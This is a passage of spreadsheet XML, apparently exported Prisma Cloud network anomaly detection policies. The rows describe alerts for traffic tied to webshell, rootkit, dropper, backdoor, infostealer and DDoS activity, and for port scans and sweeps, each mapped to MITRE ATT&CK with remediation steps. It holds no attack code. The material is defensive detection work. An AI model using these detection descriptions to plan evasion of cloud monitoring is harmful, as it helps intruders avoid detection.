          <t>anomaly</t>
        </is>
      </c>
      <c r="P1495" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1495" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1495" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1495" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Execution,Exfiltration</t>
        </is>
      </c>
      <c r="T1495" t="b">
        <v>0</v>
      </c>
      <c r="U1495" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1495" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1495" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (webshell).
        A webshell is a script that can be uploaded to a web server to enable remote administration of the machine. Infected web servers can be either Internet-facing or internal to the network, where the web shell is used to pivot further to internal hosts.</t>
        </is>
      </c>
      <c r="X1495"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95" t="inlineStr"/>
      <c r="Z1495" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1495" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1495" t="inlineStr">
        <is>
          <t>2023-08-04 06:09:47</t>
        </is>
      </c>
      <c r="AC1495" t="inlineStr"/>
      <c r="AD1495" t="b">
        <v>1</v>
      </c>
      <c r="AE1495" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1495" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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5" t="inlineStr">
        <is>
          <t>93b0e3b1-f3fb-4384-b069-70606c3ef0b9</t>
        </is>
      </c>
      <c r="AI1495" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1495" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1495" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1496">
      <c r="A1496"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96" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1496" s="2" t="inlineStr"/>
      <c r="D1496" t="inlineStr"/>
      <c r="E1496" t="inlineStr"/>
      <c r="F1496" t="inlineStr"/>
      <c r="G1496" t="b">
        <v>1</v>
      </c>
      <c r="H14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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1496" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1496" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Rootkit activity</t>
        </is>
      </c>
      <c r="L1496" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1496" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1496" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1496" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1496" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1496" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1496" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1496" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Execution,Exfiltration</t>
        </is>
      </c>
      <c r="T1496" t="b">
        <v>0</v>
      </c>
      <c r="U1496" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1496" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1496" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (rootkit).
        A rootkit is malware that is designed to infect a target machine and allow an attacker to install a set of tools that grant the attacker persistent remote access to the computer. The malware typically hides deep within the operating system, firmware, and/or driver suite and can evade detection by anti-malware applications and other security tools.</t>
        </is>
      </c>
      <c r="X1496"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96" t="inlineStr"/>
      <c r="Z1496" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1496" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1496" t="inlineStr">
        <is>
          <t>2023-08-04 06:09:47</t>
        </is>
      </c>
      <c r="AC1496" t="inlineStr"/>
      <c r="AD1496" t="b">
        <v>1</v>
      </c>
      <c r="AE1496" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1496" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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6" t="inlineStr">
        <is>
          <t>d529139d-b89c-4290-b582-cb9fe74932b0</t>
        </is>
      </c>
      <c r="AI1496" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1496" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1496" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1497">
      <c r="A1497"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97" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1497" s="2" t="inlineStr"/>
      <c r="D1497" t="inlineStr"/>
      <c r="E1497" t="inlineStr"/>
      <c r="F1497" t="inlineStr"/>
      <c r="G1497" t="b">
        <v>1</v>
      </c>
      <c r="H14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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1497" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1497" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Dropper activity</t>
        </is>
      </c>
      <c r="L1497" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1497" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1497" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1497" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1497" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1497" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1497" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1497" t="inlineStr">
        <is>
          <t>Initial Access,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1497" t="b">
        <v>0</v>
      </c>
      <c r="U1497" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1497" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1497" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (dropper), is connecting to one of your cloud hosts.
        A dropper is a type of Trojan that has been designed to install malware (virus, backdoor, etc.) onto a target system. A dropper is often considered one of the first stages of a compromise, since droppers typically deploy a second stage payload or tool.</t>
        </is>
      </c>
      <c r="X1497"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497" t="inlineStr"/>
      <c r="Z1497" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1497" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1497" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:05</t>
        </is>
      </c>
      <c r="AC1497" t="inlineStr"/>
      <c r="AD1497" t="b">
        <v>1</v>
      </c>
      <c r="AE1497" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1497" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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7" t="inlineStr">
        <is>
          <t>aa149508-9b0b-407c-af75-35eb74631455</t>
        </is>
      </c>
      <c r="AI1497" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1497" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1497" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1498">
      <c r="A1498"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498" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1498" s="2" t="inlineStr"/>
      <c r="D1498" t="n">
        <v>0</v>
      </c>
      <c r="E1498" t="n">
        <v>7</v>
      </c>
      <c r="F1498" t="n">
        <v>0</v>
      </c>
      <c r="G1498" t="b">
        <v>1</v>
      </c>
      <c r="H14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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1498" t="inlineStr">
        <is>
          <t>unusual_port_proto_network_anomaly</t>
        </is>
      </c>
      <c r="K1498" t="inlineStr">
        <is>
          <t>Traffic on unusual port to a server inside monitored cloud accounts</t>
        </is>
      </c>
      <c r="L1498" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1498" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1498" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1498" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1498" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1498" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1498" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1498" t="inlineStr">
        <is>
          <t>Evasion</t>
        </is>
      </c>
      <c r="T1498" t="b">
        <v>0</v>
      </c>
      <c r="U1498" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1498" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1498" t="inlineStr">
        <is>
          <t>Identifies accepted network traffic from one (external or internal) client host to a server host inside your cloud environment, using a server port not previously seen in the reported VPC.</t>
        </is>
      </c>
      <c r="X1498" t="inlineStr">
        <is>
          <t>1. Investigate your server host to determine if the unusual server port represents unauthorized behavior and the corresponding service should be shut down.
        2. Review the communication between your server host and the client host to determine if it conforms with your network policies.</t>
        </is>
      </c>
      <c r="Y1498" t="inlineStr"/>
      <c r="Z1498" t="inlineStr">
        <is>
          <t>unusual_port_proto_network_anomaly</t>
        </is>
      </c>
      <c r="AA1498" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB1498" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:31</t>
        </is>
      </c>
      <c r="AC1498" t="inlineStr"/>
      <c r="AD1498" t="b">
        <v>1</v>
      </c>
      <c r="AE1498" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1498" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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8" t="inlineStr">
        <is>
          <t>6233aab2-a291-3172-98c7-20bb647ebaba</t>
        </is>
      </c>
      <c r="AI1498" t="inlineStr">
        <is>
          <t>unusual_port_proto_network_anomaly</t>
        </is>
      </c>
      <c r="AJ1498" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1498" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1499">
      <c r="A1499"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499" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1499" s="2" t="inlineStr"/>
      <c r="D1499" t="inlineStr"/>
      <c r="E1499" t="inlineStr"/>
      <c r="F1499" t="inlineStr"/>
      <c r="G1499" t="b">
        <v>0</v>
      </c>
      <c r="H14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499" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1499" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1499" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with DDoS activity</t>
        </is>
      </c>
      <c r="L1499" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1499" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1499" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1499" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1499" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1499" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1499" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1499" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1499" t="b">
        <v>0</v>
      </c>
      <c r="U1499" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1499" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1499" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (DDoS malware), is connecting to one of your cloud hosts.
        DDoS malware refers to programs that contains denial of service capabilities or can become part of a network of machines to launch a distributed attack.</t>
        </is>
      </c>
      <c r="X1499"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499" t="inlineStr"/>
      <c r="Z1499" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1499" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB1499" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:42</t>
        </is>
      </c>
      <c r="AC1499" t="inlineStr"/>
      <c r="AD1499" t="b">
        <v>1</v>
      </c>
      <c r="AE1499" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1499" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG14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499" t="inlineStr">
        <is>
          <t>c3f8b692-6761-47f2-b97c-344c750abd9d</t>
        </is>
      </c>
      <c r="AI1499" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1499" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1499" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1500">
      <c r="A1500"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00" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1500" s="2" t="inlineStr"/>
      <c r="D1500" t="inlineStr"/>
      <c r="E1500" t="inlineStr"/>
      <c r="F1500" t="inlineStr"/>
      <c r="G1500" t="b">
        <v>1</v>
      </c>
      <c r="H15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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1500" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1500" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Backdoor activity</t>
        </is>
      </c>
      <c r="L1500" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1500" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1500" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1500" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1500" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1500" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1500" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1500" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Initial Access</t>
        </is>
      </c>
      <c r="T1500" t="b">
        <v>0</v>
      </c>
      <c r="U1500" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1500" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1500" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address that AutoFocus identified as malicious backdoor activity is connecting to a host deployed within your cloud.
        A backdoor is a type of malware that allows remote access of the computer where the malware is installed, while bypassing the authentication mechanisms in place. They can also be used to take control of the affected computer, allowing attackers to steal credentials and establish connections without being found.</t>
        </is>
      </c>
      <c r="X1500"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00" t="inlineStr"/>
      <c r="Z1500" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1500" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1500" t="inlineStr">
        <is>
          <t>2023-06-23 07:08:01</t>
        </is>
      </c>
      <c r="AC1500" t="inlineStr"/>
      <c r="AD1500" t="b">
        <v>1</v>
      </c>
      <c r="AE1500" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1500" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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0" t="inlineStr">
        <is>
          <t>fb22dcd7-8b0b-4bb7-b0c8-39b563037a5f</t>
        </is>
      </c>
      <c r="AI1500" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1500" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1500" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1501">
      <c r="A1501" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], Matt's ATT&amp;ACK, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B1501" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1501" s="2" t="inlineStr"/>
      <c r="D1501" t="n">
        <v>0</v>
      </c>
      <c r="E1501" t="n">
        <v>0</v>
      </c>
      <c r="F1501" t="n">
        <v>57</v>
      </c>
      <c r="G1501" t="b">
        <v>1</v>
      </c>
      <c r="H15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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1501" t="inlineStr">
        <is>
          <t>portscan_network_anomaly</t>
        </is>
      </c>
      <c r="K1501" t="inlineStr">
        <is>
          <t>Port Scan attempt from outside monitored cloud accounts</t>
        </is>
      </c>
      <c r="L1501" t="inlineStr">
        <is>
          <t>RECONNAISSANCE</t>
        </is>
      </c>
      <c r="M1501" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1501" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1501" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1501" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1501" t="inlineStr">
        <is>
          <t>TA0007</t>
        </is>
      </c>
      <c r="R1501" t="inlineStr">
        <is>
          <t>T1046 - Network Service Discovery (TA0007)</t>
        </is>
      </c>
      <c r="S1501" t="inlineStr">
        <is>
          <t>Attack Path Rule,Discovery,Reconnaissance</t>
        </is>
      </c>
      <c r="T1501" t="b">
        <v>0</v>
      </c>
      <c r="U1501" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1501" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1501" t="inlineStr">
        <is>
          <t>Identifies port scan attempts by inspecting the rejected inbound traffic to your cloud environment. A host outside your environment is scanning one of your cloud hosts. Port scans are a type of discovery attack where a source host is probing a target host across multiple ports, to find out what services are running and to uncover vulnerabilities associated with those services.</t>
        </is>
      </c>
      <c r="X1501" t="inlineStr">
        <is>
          <t>1. Review the list of scanned ports to determine the ones to be closed. Reducing the number of ports available decreases the opportunities for adversaries to compromise your cloud resources. 
        2. Please review and fix any violating policy associated with the target host in the alert, as reported by Prisma Cloud.</t>
        </is>
      </c>
      <c r="Y1501" t="inlineStr"/>
      <c r="Z1501" t="inlineStr">
        <is>
          <t>portscan_network_anomaly</t>
        </is>
      </c>
      <c r="AA1501" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1501" t="inlineStr">
        <is>
          <t>2023-06-23 07:08:01</t>
        </is>
      </c>
      <c r="AC1501" t="inlineStr"/>
      <c r="AD1501" t="b">
        <v>1</v>
      </c>
      <c r="AE1501" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1501" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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1" t="inlineStr">
        <is>
          <t>6544aab1-ff97-4971-98c7-40ee647e9b9b</t>
        </is>
      </c>
      <c r="AI1501" t="inlineStr">
        <is>
          <t>portscan_network_anomaly</t>
        </is>
      </c>
      <c r="AJ1501" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1501" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1502">
      <c r="A1502"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02" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1502" s="2" t="inlineStr"/>
      <c r="D1502" t="inlineStr"/>
      <c r="E1502" t="inlineStr"/>
      <c r="F1502" t="inlineStr"/>
      <c r="G1502" t="b">
        <v>1</v>
      </c>
      <c r="H15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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1502" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1502" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with InfoStealer activity</t>
        </is>
      </c>
      <c r="L1502" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1502" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1502" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1502" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1502" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1502" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1502" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1502" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Initial Access</t>
        </is>
      </c>
      <c r="T1502" t="b">
        <v>0</v>
      </c>
      <c r="U1502" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1502" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1502" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (infostealer), is connecting to one of your cloud hosts.
        Infostealers are malicious software programs that gather confidential information from the compromised computer to send it to a predetermined location. This can include information related to the compromised computer, financial data, or user credentials for various web sites.</t>
        </is>
      </c>
      <c r="X1502"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02" t="inlineStr"/>
      <c r="Z1502" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1502" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1502" t="inlineStr">
        <is>
          <t>2023-06-23 07:08:01</t>
        </is>
      </c>
      <c r="AC1502" t="inlineStr"/>
      <c r="AD1502" t="b">
        <v>1</v>
      </c>
      <c r="AE1502" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1502" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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2" t="inlineStr">
        <is>
          <t>378377a3-f430-4baf-8732-6cf0eea71324</t>
        </is>
      </c>
      <c r="AI1502" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1502" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1502" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1503">
      <c r="A1503" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], Matt's ATT&amp;ACK, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B1503" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1503" s="2" t="inlineStr"/>
      <c r="D1503" t="inlineStr"/>
      <c r="E1503" t="inlineStr"/>
      <c r="F1503" t="inlineStr"/>
      <c r="G1503" t="b">
        <v>0</v>
      </c>
      <c r="H15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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1503" t="inlineStr">
        <is>
          <t>portsweep_network_anomaly</t>
        </is>
      </c>
      <c r="K1503" t="inlineStr">
        <is>
          <t>Port Sweep attempt from inside monitored cloud accounts</t>
        </is>
      </c>
      <c r="L1503" t="inlineStr">
        <is>
          <t>DISCOVERY</t>
        </is>
      </c>
      <c r="M1503" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1503" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1503" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1503" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1503" t="inlineStr">
        <is>
          <t>TA0007</t>
        </is>
      </c>
      <c r="R1503" t="inlineStr">
        <is>
          <t>T1046 - Network Service Discovery (TA0007)</t>
        </is>
      </c>
      <c r="S1503" t="inlineStr">
        <is>
          <t>Discovery,Reconnaissance</t>
        </is>
      </c>
      <c r="T1503" t="b">
        <v>0</v>
      </c>
      <c r="U1503" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1503" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1503" t="inlineStr">
        <is>
          <t>Identifies port sweep attempts by inspecting the rejected traffic from your cloud environment. A host inside your environment is scanning multiple hosts, which might also be located inside or outside. Port sweeps are a type of discovery attack where a source host is probing multiple target hosts on a single port, to identify the service associated with the port.</t>
        </is>
      </c>
      <c r="X1503" t="inlineStr">
        <is>
          <t>1. Review the list of target hosts to determine those where the port can be closed. Reducing the number of ports available decreases the opportunities for adversaries to compromise your cloud resources.
        2. Please review the source host in the alert as the sweep could be an indication of a compromised host.</t>
        </is>
      </c>
      <c r="Y1503" t="inlineStr"/>
      <c r="Z1503" t="inlineStr">
        <is>
          <t>portsweep_network_anomaly</t>
        </is>
      </c>
      <c r="AA1503" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB1503" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:40</t>
        </is>
      </c>
      <c r="AC1503" t="inlineStr"/>
      <c r="AD1503" t="b">
        <v>1</v>
      </c>
      <c r="AE1503" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1503" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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3" t="inlineStr">
        <is>
          <t>6a53ccd3-11b9-6b93-bae9-30ee647e776a</t>
        </is>
      </c>
      <c r="AI1503" t="inlineStr">
        <is>
          <t>portsweep_network_anomaly</t>
        </is>
      </c>
      <c r="AJ1503" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1503" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1504">
      <c r="A1504"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04" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1504" s="2" t="inlineStr"/>
      <c r="D1504" t="inlineStr"/>
      <c r="E1504" t="inlineStr"/>
      <c r="F1504" t="inlineStr"/>
      <c r="G1504" t="b">
        <v>1</v>
      </c>
      <c r="H15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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1504" t="inlineStr">
        <is>
          <t>unusual_port_proto_network_anomaly</t>
        </is>
      </c>
      <c r="K1504" t="inlineStr">
        <is>
          <t>Traffic with unusual protocol to a server outside monitored cloud accounts</t>
        </is>
      </c>
      <c r="L1504" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1504" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1504" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
